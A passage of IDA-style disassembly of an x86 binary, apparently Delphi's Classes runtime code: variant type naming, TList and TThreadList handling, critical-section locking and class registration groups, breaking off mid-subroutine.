var_104 = byte ptr -104h
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFDF8h
push ebx
push esi
push edi
xor ecx, ecx
mov [ebp+var_208], ecx
mov esi, edx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_40012A62
push dword ptr fs:[eax]
mov fs:[eax], esp
mov edi, ebx
and di, 0FFFh
cmp di, 14h
ja short loc_40012985
mov eax, esi
movzx edx, di
mov edx, off_4001AA20[edx*4]
call sub_400048D8
jmp loc_40012A23
; ---------------------------------------------------------------------------
loc_40012985: ; CODE XREF: sub_4001293C+31�j
cmp bx, 100h
jnz short loc_4001299D
mov eax, esi
mov edx, offset aString_0 ; "String"
call sub_400048D8
jmp loc_40012A23
; ---------------------------------------------------------------------------
loc_4001299D: ; CODE XREF: sub_4001293C+4E�j
cmp bx, 101h
jnz short loc_400129B2
mov eax, esi
mov edx, offset dword_40012A88
call sub_400048D8
jmp short loc_40012A23
; ---------------------------------------------------------------------------
loc_400129B2: ; CODE XREF: sub_4001293C+66�j
lea edx, [ebp+var_4]
mov eax, ebx
call sub_40012D98
test al, al
jz short loc_400129FB
lea eax, [ebp+var_104]
push eax
lea edx, [ebp+var_204]
mov eax, [ebp+var_4]
mov eax, [eax]
call sub_40003C6C
lea eax, [ebp+var_204]
mov ecx, 7FFFFFFFh
mov edx, 2
call sub_40002D98
lea edx, [ebp+var_104]
mov eax, esi
call sub_40004AE8
jmp short loc_40012A23
; ---------------------------------------------------------------------------
loc_400129FB: ; CODE XREF: sub_4001293C+82�j
lea ecx, [ebp+var_208]
movzx eax, di
mov edx, 4
call sub_40007DAC
mov ecx, [ebp+var_208]
mov edx, off_4001B09C
mov edx, [edx]
mov eax, esi
call sub_40004B94
loc_40012A23: ; CODE XREF: sub_4001293C+44�j
; sub_4001293C+5C�j ...
test bh, 20h
jz short loc_40012A36
mov ecx, [esi]
mov eax, esi
mov edx, offset dword_40012A94
call sub_40004B94
loc_40012A36: ; CODE XREF: sub_4001293C+EA�j
test bh, 40h
jz short loc_40012A49
mov ecx, [esi]
mov eax, esi
mov edx, offset dword_40012AA4
call sub_40004B94
loc_40012A49: ; CODE XREF: sub_4001293C+FD�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40012A69
loc_40012A56: ; CODE XREF: sub_4001293C+12B�j
lea eax, [ebp+var_208]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_40012A62: ; DATA XREF: sub_4001293C+1B�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40012A56
; ---------------------------------------------------------------------------
loc_40012A69: ; CODE XREF: sub_4001293C+125�j
; DATA XREF: sub_4001293C+115�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4001293C endp
; ---------------------------------------------------------------------------
dd 0FFFFFFFFh, 6
aString_0 db 'String',0 ; DATA XREF: sub_4001293C+52�o
align 10h
dd 0FFFFFFFFh, 3
dword_40012A88 dd 796E41h, 0FFFFFFFFh, 6dword_40012A94 dd 61727241h, 2079h, 0FFFFFFFFh, 6dword_40012AA4 dd 65527942h, 2066h
; =============== S U B R O U T I N E =======================================
sub_40012AAC proc near ; CODE XREF: sub_40012AC4+5�p
push ebx
push esi
mov esi, edx
mov ebx, eax
mov eax, ebx
call sub_4000E3D8
mov word ptr [ebx], 0Ah
mov [ebx+8], esi
pop esi
pop ebx
retn
sub_40012AAC endp
; =============== S U B R O U T I N E =======================================
sub_40012AC4 proc near ; CODE XREF: sub_40019144+1F�p
mov edx, 80020004h
call sub_40012AAC
retn
sub_40012AC4 endp
; ---------------------------------------------------------------------------
align 10h
off_40012AD0 dd offset dword_40012AD4 ; DATA XREF: sub_40012E54+56�r
dword_40012AD4 dd 302E0311h, 432h, 0 dd 0FFFFFF00h
db 0FFh
dd offset off_4000D6B4
db 8, 56h, 61h
dd 6E616972h, 0C08B7374h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40012AF4 proc near ; CODE XREF: sub_40012E54+19�p
push ebp
mov ebp, esp
push ebx
push esi
mov esi, offset dword_4001F2A8
push offset dword_4001F2AC
call sub_40006520 ; RtlEnterCriticalSection
xor edx, edx
push ebp
push offset loc_40012B55
push dword ptr fs:[edx]
mov fs:[edx], esp
mov eax, [esi]
call sub_4000596C
mov ebx, eax
dec ebx
cmp ebx, 0
jl short loc_40012B3D
loc_40012B25: ; CODE XREF: sub_40012AF4+47�j
mov eax, [esi]
mov eax, [eax+ebx*4]
cmp eax, dword_4001AA1C
jz short loc_40012B37
call sub_40003CE8
loc_40012B37: ; CODE XREF: sub_40012AF4+3C�j
dec ebx
cmp ebx, 0FFFFFFFFh
jnz short loc_40012B25
loc_40012B3D: ; CODE XREF: sub_40012AF4+2F�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40012B5C
loc_40012B4A: ; CODE XREF: sub_40012AF4+66�j
push offset dword_4001F2AC
call sub_400065E8 ; RtlLeaveCriticalSection
retn
; ---------------------------------------------------------------------------
loc_40012B55: ; DATA XREF: sub_40012AF4+17�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40012B4A
; ---------------------------------------------------------------------------
loc_40012B5C: ; DATA XREF: sub_40012AF4+51�o
pop esi
pop ebx
pop ebp
retn
sub_40012AF4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40012B60 proc near ; DATA XREF: .text:4000D690�o
push ebp
mov ebp, esp
call sub_40012D20
pop ebp
retn 4
sub_40012B60 endp
; =============== S U B R O U T I N E =======================================
sub_40012B6C proc near ; DATA XREF: .text:4000D67C�o
var_10 = dword ptr -10h
push ebx
push esi
push edi
push ecx
mov esi, ecx
mov edi, edx
mov ebx, eax
mov edx, esp
movzx eax, word ptr [esi]
call sub_40012D98
test al, al
jz short loc_40012B98
movzx eax, word ptr [ebx+4]
push eax
mov ecx, esi
mov edx, edi
mov eax, [esp+14h+var_10]
mov ebx, [eax]
call dword ptr [ebx+1Ch]
jmp short loc_40012B9F
; ---------------------------------------------------------------------------
loc_40012B98: ; CODE XREF: sub_40012B6C+16�j
mov eax, ebx
call sub_40012D18
loc_40012B9F: ; CODE XREF: sub_40012B6C+2A�j
pop edx
pop edi
pop esi
pop ebx
retn
sub_40012B6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40012BA4 proc near ; DATA XREF: .text:4000D680�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov esi, ecx
mov [ebp+var_4], edx
mov ebx, eax
mov edi, [ebp+arg_0]
cmp di, [ebx+4]
jz short loc_40012BDC
lea edx, [ebp+var_8]
movzx eax, word ptr [esi]
call sub_40012D98
test al, al
jz short loc_40012BDC
push edi
mov ecx, esi
mov edx, [ebp+var_4]
mov eax, [ebp+var_8]
mov ebx, [eax]
call dword ptr [ebx+1Ch]
jmp short loc_40012BE3
; ---------------------------------------------------------------------------
loc_40012BDC: ; CODE XREF: sub_40012BA4+17�j
; sub_40012BA4+26�j
mov eax, ebx
call sub_40012D18
loc_40012BE3: ; CODE XREF: sub_40012BA4+36�j
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn 4
sub_40012BA4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40012BEC proc near ; DATA XREF: .text:4000D69C�o
push ebp
mov ebp, esp
call sub_40012D20
pop ebp
retn 4
sub_40012BEC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40012BF8 proc near ; DATA XREF: .text:4000D698�o
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, edx
mov esi, eax
lea eax, [ebp+var_1]
push eax
mov edx, edi
mov eax, esi
mov ebx, [eax]
call dword ptr [ebx+38h]
movzx eax, [ebp+var_1]
mov edx, [ebp+arg_0]
lea edx, [edx+edx*2]
add edx, offset dword_4001AA74
movzx eax, byte ptr [edx+eax-2Ah]
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn 4
sub_40012BF8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40012C30 proc near ; DATA XREF: .text:4000D684�o
var_14 = word ptr -14h
push ebx
push esi
push edi
push ebp
push ecx
mov esi, ecx
mov edi, edx
mov ebx, eax
mov ecx, esp
mov edx, esi
mov eax, ebx
mov ebp, [eax]
call dword ptr [ebp+0Ch]
test al, al
jz short loc_40012C5C
movzx eax, [esp+14h+var_14]
push eax
mov ecx, esi
mov edx, edi
mov eax, ebx
mov ebx, [eax]
call dword ptr [ebx+1Ch]
jmp short loc_40012C63
; ---------------------------------------------------------------------------
loc_40012C5C: ; CODE XREF: sub_40012C30+18�j
mov eax, ebx
call sub_40012D18
loc_40012C63: ; CODE XREF: sub_40012C30+2A�j
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_40012C30 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40012C6C proc near ; DATA XREF: .text:4000D660�o
var_5 = byte ptr -5
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
call sub_40003FD8
mov [ebp+var_5], dl
mov [ebp+var_4], eax
push offset dword_4001F2AC
call sub_40006520 ; RtlEnterCriticalSection
xor edx, edx
push ebp
push offset loc_40012CCF
push dword ptr fs:[edx]
mov fs:[edx], esp
mov eax, [ebp+var_4]
movzx eax, word ptr [eax+4]
test ax, ax
jz short loc_40012CB7
movzx eax, ax
mov edx, ds:dword_4001F2A8
mov ecx, dword_4001AA1C
mov [edx+eax*4-400h], ecx
loc_40012CB7: ; CODE XREF: sub_40012C6C+33�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40012CD6
loc_40012CC4: ; CODE XREF: sub_40012C6C+68�j
push offset dword_4001F2AC
call sub_400065E8 ; RtlLeaveCriticalSection
retn
; ---------------------------------------------------------------------------
loc_40012CCF: ; DATA XREF: sub_40012C6C+1E�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40012CC4
; ---------------------------------------------------------------------------
loc_40012CD6: ; DATA XREF: sub_40012C6C+53�o
movzx edx, [ebp+var_5]
and dl, 0FCh
mov eax, [ebp+var_4]
call sub_40003CD8
cmp [ebp+var_5], 0
jle short loc_40012CF3
mov eax, [ebp+var_4]
call sub_40003F80
loc_40012CF3: ; CODE XREF: sub_40012C6C+7D�j
pop ecx
pop ecx
pop ebp
retn
sub_40012C6C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40012CF8 proc near ; DATA XREF: .text:4000D678�o
xor eax, eax
retn
sub_40012CF8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40012CFC proc near ; DATA XREF: .text:4000D668�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov edx, [ebp+arg_0]
movzx eax, word ptr [eax+4]
mov [edx], ax
mov al, 1
pop ebp
retn 4
sub_40012CFC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40012D10 proc near ; DATA XREF: .text:4000D670�o
mov word ptr [ecx], 8
mov al, 1
retn
sub_40012D10 endp
; =============== S U B R O U T I N E =======================================
sub_40012D18 proc near ; CODE XREF: sub_40012B6C+2E�p
; sub_40012BA4+3A�p ...
call sub_4000DBA0
retn
sub_40012D18 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40012D20 proc near ; CODE XREF: sub_40012B60+3�p
; sub_40012BEC+3�p ...
call sub_4000DC90
retn
sub_40012D20 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40012D28 proc near ; CODE XREF: sub_40012D4C+3�p
call sub_4000E0EC
retn
sub_40012D28 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40012D30 proc near ; DATA XREF: .text:4000D66C�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov edx, [ebp+arg_0]
movzx eax, word ptr [eax+4]
mov [edx], ax
mov al, 1
pop ebp
retn 4
sub_40012D30 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40012D44 proc near ; DATA XREF: .text:4000D694�o
call sub_40012D20
retn
sub_40012D44 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40012D4C proc near ; DATA XREF: .text:4000D674�o
push ebp
mov ebp, esp
call sub_40012D28
pop ebp
retn 8
sub_40012D4C endp
; ---------------------------------------------------------------------------
loc_40012D58: ; CODE XREF: .text:4000D5DB�j
push ebp
mov ebp, esp
or eax, 0FFFFFFFFh
pop ebp
retn 4
; ---------------------------------------------------------------------------
align 4
loc_40012D64: ; CODE XREF: .text:4000D5E5�j
push ebp
mov ebp, esp
or eax, 0FFFFFFFFh
pop ebp
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40012D70 proc near ; DATA XREF: .text:off_4000D664�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
mov ecx, [ebp+arg_8]
mov edx, [ebp+arg_4]
mov eax, ebx
call sub_40003D9C
test al, al
jz short loc_40012D8C
xor eax, eax
jmp short loc_40012D91
; ---------------------------------------------------------------------------
loc_40012D8C: ; CODE XREF: sub_40012D70+16�j
mov eax, 80004002h
loc_40012D91: ; CODE XREF: sub_40012D70+1A�j
pop ebx
pop ebp
retn 0Ch
sub_40012D70 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40012D98 proc near ; CODE XREF: sub_4000E35C+56�p
; sub_4000E654+80�p ...
var_1 = byte ptr -1
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov esi, edx
mov ebx, eax
cmp ds:dword_4001F2A8, 0
jz short loc_40012DBA
cmp bx, 100h
jb short loc_40012DBA
cmp bx, 7FFh
jbe short loc_40012DBE
loc_40012DBA: ; CODE XREF: sub_40012D98+12�j
; sub_40012D98+19�j
xor eax, eax
jmp short loc_40012DC0
; ---------------------------------------------------------------------------
loc_40012DBE: ; CODE XREF: sub_40012D98+20�j
mov al, 1
loc_40012DC0: ; CODE XREF: sub_40012D98+24�j
mov [ebp+var_1], al
cmp [ebp+var_1], 0
jz short loc_40012E47
push offset dword_4001F2AC
call sub_40006520 ; RtlEnterCriticalSection
xor eax, eax
push ebp
push offset loc_40012E40
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, ds:dword_4001F2A8
call sub_4000596C
movzx edi, bx
mov edx, edi
sub edx, 100h
cmp eax, edx
setnle [ebp+var_1]
cmp [ebp+var_1], 0
jz short loc_40012E28
mov eax, ds:dword_4001F2A8
mov eax, [eax+edi*4-400h]
mov [esi], eax
cmp dword ptr [esi], 0
jz short loc_40012E1F
mov eax, [esi]
cmp eax, dword_4001AA1C
jnz short loc_40012E23
loc_40012E1F: ; CODE XREF: sub_40012D98+7B�j
xor eax, eax
jmp short loc_40012E25
; ---------------------------------------------------------------------------
loc_40012E23: ; CODE XREF: sub_40012D98+85�j
mov al, 1
loc_40012E25: ; CODE XREF: sub_40012D98+89�j
mov [ebp+var_1], al
loc_40012E28: ; CODE XREF: sub_40012D98+68�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40012E47
loc_40012E35: ; CODE XREF: sub_40012D98+AD�j
push offset dword_4001F2AC
call sub_400065E8 ; RtlLeaveCriticalSection
retn
; ---------------------------------------------------------------------------
loc_40012E40: ; DATA XREF: sub_40012D98+3E�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40012E35
; ---------------------------------------------------------------------------
loc_40012E47: ; CODE XREF: sub_40012D98+2F�j
; DATA XREF: sub_40012D98+98�o
movzx eax, [ebp+var_1]
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn
sub_40012D98 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40012E54 proc near ; DATA XREF: .text:40018380�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_40012EC3
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4001F2A4
jnz short loc_40012EB5
call sub_40012AF4
push offset dword_4001F2AC
call sub_40006518 ; RtlDeleteCriticalSection
mov eax, offset dword_4001F284
call sub_4000E3EC
mov eax, offset dword_4001AA14
call sub_40004884
mov eax, offset off_4001AA20
mov ecx, 15h
mov edx, ds:off_40001000
call sub_40005314
mov eax, offset dword_4001F2A8
mov edx, ds:off_40012AD0
call sub_40005B34
loc_40012EB5: ; CODE XREF: sub_40012E54+17�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40012ECA
loc_40012EC2: ; CODE XREF: sub_40012E54+74�j
retn
; ---------------------------------------------------------------------------
loc_40012EC3: ; DATA XREF: sub_40012E54+6�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40012EC2
; ---------------------------------------------------------------------------
loc_40012ECA: ; CODE XREF: sub_40012E54:loc_40012EC2�j
; DATA XREF: sub_40012E54+69�o
pop ebp
retn
sub_40012E54 endp
; ---------------------------------------------------------------------------
off_40012ECC dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AFAC�o
dd 0FFAAh
dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AF90�o
dd 0FFABh
dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AF7C�o
dd 0FFACh
off_40012EE4 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AFE4�o
dd 0FFADh
off_40012EEC dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AFA0�o
dd 0FFAEh
dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001B05C�o
dd 0FFAFh
dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001B0D4�o
db 90h
db 0FFh, 2 dup(0)
dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AFCC�o
dd 0FF91h, 0FFFFFFFFh, 5
aFalse_0 db 'False',0 ; DATA XREF: .data:off_4001AA88�o
align 4
dword_40012F1C dd 0FFFFFFFFh, 4, 65757254h, 0 dd 0FFFFFFFFh, 1
dword_40012F34 dd 2Eh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40012F38 proc near ; DATA XREF: .text:40018390�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_40012F7E
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4001F2C4
jnz short loc_40012F70
mov eax, offset off_4001AA88
mov ecx, 2
mov edx, ds:off_40001000
call sub_40005314
mov eax, offset off_4001AA90
call sub_40004884
loc_40012F70: ; CODE XREF: sub_40012F38+17�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40012F85
loc_40012F7D: ; CODE XREF: sub_40012F38+4B�j
retn
; ---------------------------------------------------------------------------
loc_40012F7E: ; DATA XREF: sub_40012F38+6�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40012F7D
; ---------------------------------------------------------------------------
loc_40012F85: ; CODE XREF: sub_40012F38:loc_40012F7D�j
; DATA XREF: sub_40012F38+40�o
pop ebp
retn
sub_40012F38 endp
; ---------------------------------------------------------------------------
align 4
off_40012F88 dd offset dword_40012FD4 ; DATA XREF: sub_40013770+23�r
dd 7 dup(0)
dd offset dword_40012FD4
dd 0Ch
dd offset off_40006DE0
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_40012FD4 dd 694C450Ah, 72457473h, 90726F72h ; .text:40012FA8�o
off_40012FE0 dd offset dword_4001302C ; DATA XREF: sub_4001552C+36�r
dd 7 dup(0)
dd offset dword_4001302C
dd 0Ch
dd offset off_40006DE0
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_4001302C dd 6E494511h, 696C6176h, 65704F64h, 69746172h, 0C08B6E6Fh
; DATA XREF: .text:off_40012FE0�o
; .text:40013000�o
off_40013040 dd offset off_4001308C ; DATA XREF: sub_4001326C+25�r
; sub_400133D4+1E�r ...
dd 7 dup(0)
dd offset dword_4001309C
dd 10h
dd offset off_4000101C
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_4001369C
off_4001308C dd offset loc_40013824 ; DATA XREF: .text:off_40013040�o
dd offset nullsub_5
dd offset sub_400136F0
dd offset sub_40013770
dword_4001309C dd 694C5405h, 0C08B7473hoff_400130A4 dd offset dword_400130F0 ; DATA XREF: sub_400191F8+5B�r
; sub_400191F8+6C�r ...
dd 7 dup(0)
dd offset dword_400130F0
dd 24h
dd offset off_4000101C
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_400139A0
dword_400130F0 dd 6854540Bh, 64616572h, 7473694Ch ; .text:400130C4�o
dd offset off_40013148 ; DATA XREF: sub_400133D4+34�r
dd 3 dup(0)
dd offset dword_40013174
dd 2 dup(0)
dd offset dword_40013154
dd offset word_40013162
dd 4
dd offset off_4000101C
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40013B14
off_40013148 dd offset loc_40013C24 ; DATA XREF: .text:400130FC�o
; .text:40013181�o
dd offset nullsub_6
dd offset sub_40013B40
dword_40013154 dd 0FFFF0002h db 0FEh, 0FFh
dd offset loc_40013CE0
dd offset sub_40013C30
word_40013162 dw 540Bh ; DATA XREF: .text:4001311C�o
dd 73726550h, 65747369h, 0C08B746Eh
dd offset dword_40013174
dword_40013174 dd 50540B07h, 69737265h, 6E657473h ; .text:40013170�o
db 74h
dd offset off_40013148
dd offset off_40001070
db 2 dup(0), 7
aClasses db 'Classes',0
align 8
off_40013198 dd offset dword_4001319C ; DATA XREF: sub_40015C34+9B�r
; sub_40015C34+B0�r
dword_4001319C dd 49540E0Eh, 746E6564h, 4570614Dh, 7972746Eh, 8, 1
; DATA XREF: .text:off_40013198�o
dd offset off_40001000
dd 4
off_400131BC dd offset dword_40013208 ; DATA XREF: sub_400133D4+3C�r
dd 7 dup(0)
dd offset dword_40013208
dd 14h
dd offset off_4000101C
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_400132C8
dword_40013208 dd 65525409h, 6F724767h, 0C08B7075h ; .text:400131DC�o
off_40013214 dd offset dword_40013260 ; DATA XREF: sub_400191F8+4A�r
dd 7 dup(0)
dd offset dword_40013260
dd 24h
dd offset off_4000101C
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40013448
dword_40013260 dd 6552540Ah, 6F724767h, 90737075h ; .text:40013234�o
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4001326C proc near ; CODE XREF: sub_400133D4+41�p
var_1 = byte ptr -1
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
test dl, dl
jz short loc_4001327F
add esp, 0FFFFFFF0h
call sub_40003F30
loc_4001327F: ; CODE XREF: sub_4001326C+9�j
mov edi, ecx
mov [ebp+var_1], dl
mov ebx, eax
xor edx, edx
mov eax, ebx
call sub_40003CB8
mov dl, 1
mov eax, ds:off_40013040
call sub_40003CB8
mov esi, eax
mov [ebx+0Ch], esi
mov eax, esi
mov edx, edi
call sub_400136BC
mov eax, ebx
cmp [ebp+var_1], 0
jz short loc_400132C0
call sub_40003F88
pop large dword ptr fs:0
add esp, 0Ch
loc_400132C0: ; CODE XREF: sub_4001326C+43�j
mov eax, ebx
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn
sub_4001326C endp
; =============== S U B R O U T I N E =======================================
sub_400132C8 proc near ; DATA XREF: .text:40013204�o
push ebx
push esi
call sub_40003FD8
mov ebx, edx
mov esi, eax
mov edx, ebx
and dl, 0FCh
mov eax, esi
call sub_40003CD8
mov eax, [esi+4]
call sub_40003CE8
mov eax, [esi+8]
call sub_40003CE8
mov eax, [esi+0Ch]
call sub_40003CE8
test bl, bl
jle short loc_40013302
mov eax, esi
call sub_40003F80
loc_40013302: ; CODE XREF: sub_400132C8+31�j
pop esi
pop ebx
retn
sub_400132C8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40013308 proc near ; CODE XREF: sub_40013328+1F�p
; sub_40013328+54�p ...
push ebx
push esi
mov ebx, edx
mov esi, eax
test ebx, ebx
jz short loc_40013322
mov eax, esi
call sub_40005B98
cmp ebx, eax
jz short loc_40013322
xor eax, eax
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40013322: ; CODE XREF: sub_40013308+8�j
; sub_40013308+13�j
mov al, 1
pop esi
pop ebx
retn
sub_40013308 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40013328 proc near ; CODE XREF: sub_400134C0+24�p
push ebx
push esi
push edi
mov edi, edx
mov esi, eax
mov eax, [esi+0Ch]
mov ebx, [eax+8]
dec ebx
cmp ebx, 0
jl short loc_40013360
loc_4001333B: ; CODE XREF: sub_40013328+36�j
mov edx, ebx
mov eax, [esi+0Ch]
call sub_400137FC
mov edx, edi
call sub_40013308
test al, al
jz short loc_4001335A
mov edx, ebx
mov eax, [esi+0Ch]
call sub_40013708
loc_4001335A: ; CODE XREF: sub_40013328+26�j
dec ebx
cmp ebx, 0FFFFFFFFh
jnz short loc_4001333B
loc_40013360: ; CODE XREF: sub_40013328+11�j
mov eax, [esi+4]
test eax, eax
jz short loc_40013395
mov ebx, [eax+8]
dec ebx
cmp ebx, 0
jl short loc_40013395
loc_40013370: ; CODE XREF: sub_40013328+6B�j
mov edx, ebx
mov eax, [esi+4]
call sub_400137FC
mov edx, edi
call sub_40013308
test al, al
jz short loc_4001338F
mov edx, ebx
mov eax, [esi+4]
call sub_40013708
loc_4001338F: ; CODE XREF: sub_40013328+5B�j
dec ebx
cmp ebx, 0FFFFFFFFh
jnz short loc_40013370
loc_40013395: ; CODE XREF: sub_40013328+3D�j
; sub_40013328+46�j
mov ebx, [esi+8]
test ebx, ebx
jz short loc_400133D0
mov eax, ebx
mov edx, [eax]
call dword ptr [edx+14h]
dec eax
cmp eax, 0
jl short loc_400133D0
mov ebx, eax
loc_400133AB: ; CODE XREF: sub_40013328+A6�j
mov edx, ebx
mov eax, [esi+8]
mov ecx, [eax]
call dword ptr [ecx+18h]
mov edx, edi
call sub_40013308
test al, al
jz short loc_400133CA
mov edx, ebx
mov eax, [esi+8]
mov ecx, [eax]
call dword ptr [ecx+48h]
loc_400133CA: ; CODE XREF: sub_40013328+96�j
dec ebx
cmp ebx, 0FFFFFFFFh
jnz short loc_400133AB
loc_400133D0: ; CODE XREF: sub_40013328+72�j
; sub_40013328+7F�j
pop edi
pop esi
pop ebx
retn
sub_40013328 endp
; =============== S U B R O U T I N E =======================================
sub_400133D4 proc near ; CODE XREF: sub_400191F8+4F�p
push ebx
push esi
push edi
test dl, dl
jz short loc_400133E3
add esp, 0FFFFFFF0h
call sub_40003F30
loc_400133E3: ; CODE XREF: sub_400133D4+5�j
mov ebx, edx
mov edi, eax
xor edx, edx
mov eax, edi
call sub_40003CB8
mov dl, 1
mov eax, ds:off_40013040
call sub_40003CB8
mov [edi+4], eax
lea eax, [edi+8]
push eax
call sub_400065E0 ; InitializeCriticalSection
mov ecx, ds:off_400130FC
mov dl, 1
mov eax, ds:off_400131BC
call sub_4001326C
mov esi, eax
mov eax, [edi+4]
mov edx, esi
call sub_400136BC
mov byte ptr [esi+10h], 1
mov eax, edi
test bl, bl
jz short loc_4001343F
call sub_40003F88
pop large dword ptr fs:0
add esp, 0Ch
loc_4001343F: ; CODE XREF: sub_400133D4+5A�j
mov eax, edi
pop edi
pop esi
pop ebx
retn
sub_400133D4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40013448 proc near ; DATA XREF: .text:4001325C�o
push ebx
push esi
push edi
push ebp
call sub_40003FD8
mov ebx, edx
mov ebp, eax
lea eax, [ebp+8]
push eax
call sub_40006518 ; RtlDeleteCriticalSection
mov eax, [ebp+4]
test eax, eax
jz short loc_40013483
mov esi, [eax+8]
dec esi
test esi, esi
jl short loc_40013483
inc esi
xor edi, edi
loc_40013470: ; CODE XREF: sub_40013448+39�j
mov eax, [ebp+4]
mov edx, edi
call sub_400137FC
call sub_40003CE8
inc edi
dec esi
jnz short loc_40013470
loc_40013483: ; CODE XREF: sub_40013448+1B�j
; sub_40013448+23�j
mov eax, [ebp+4]
call sub_40003CE8
mov edx, ebx
and dl, 0FCh
mov eax, ebp
